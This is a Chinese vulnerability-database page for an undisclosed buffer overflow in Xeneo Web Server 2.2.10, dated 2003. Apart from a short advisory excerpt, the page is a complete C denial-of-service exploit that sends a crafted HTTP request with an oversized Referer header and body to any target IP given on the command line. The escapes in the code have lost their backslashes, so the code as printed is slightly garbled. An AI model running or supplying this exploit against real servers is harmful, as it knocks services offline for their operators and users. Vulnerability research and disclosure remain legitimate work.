Xeneo Web Server 2.2.10 – Undisclosed Buffer Overflow (PoC)
漏洞ID | 1053852 | 漏洞类型 | |
发布时间 | 2003-04-23 | 更新时间 | 2003-04-23 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/7410/info
Xeneo web server has been reported prone to an undisclosed buffer overflow vulnerability.
It has been reported that a specifically crafted HTTP request containing malicious HTTP header information will trigger this condition.
Although unconfirmed, this issue may be exploited to execute arbitrary code.
It should also be noted, that although this vulnerability has been reported to affect Xeneo web server version 2.2.10.0 previous versions may also be vulnerable.
*/
/* Xeneo Web Server 2.2.2.10.0 DoS
*
* Vulnerable systems:
* Xeneo Web Server 2.2.10.0
* Vendor:
* http://www.northernsolutions.com
*
* Written and found by badpack3t <[email protected]>
* For SP Research Labs
* 04/23/2003
*
* www.security-protocols.com
*
* usage:
* sp-xeneo2 <targetip> [targetport] (default is 80)
*
* big ups 2:
* c0nnie, ^Foster, ac1djazz, mp, regulate, stripey, dvdman, hex_, inet
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
"GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1rn"
"Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%rn"
"Content-Type: application/x-www-form-urlencodedrn"
"Connection: Keep-Alivern"
"Cookie: VARIABLE=SPLABS; path=/rn"
"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)rn"
"Variable: resultrn"
"Host: localhostrn"
"Content-length: 513rn"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/pngrn"
"Accept-Encoding: gziprn"
"Accept-Language: enrn"
"Accept-Charset: iso-8859-1,*,utf-8rnrnrn"
"whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArn";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target, buffer[30000];
int port,bufsize;
SOCKET mysocket;
if (argc < 2)
{
printf("Xeneo Web Server 2.2.10.0 DoSrn <[email protected]>rnrn", argv[0]);
printf("Tool Usage:rn %s <targetip> [targetport] (default is 80)rnrn", argv[0]);
printf("www.security-protocols.comrnrn", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
//for default web attacks
port = 80;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 512;
if (argc >= 4) bufsize = atoi(argv[3]);
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error!rn");
exit(1);
}
printf("Resolving Hostnames...n");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failedn", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.n");
exit(1);
}
printf("Connected!...n");
printf("Sending Payload...n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payloadrn");
closesocket(mysocket);
exit(1);
}
printf("Remote Webserver has been DoS'ed rn");
closesocket(mysocket);
WSACleanup();
return 0;
}
相关推荐: Sun Cluster Daemon Information Disclosure Vulnerability
Sun Cluster Daemon Information Disclosure Vulnerability 漏洞ID 1103619 漏洞类型 Design Error 发布时间 2000-12-12 更新时间 2000-12-12 CVE编号 N/A C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666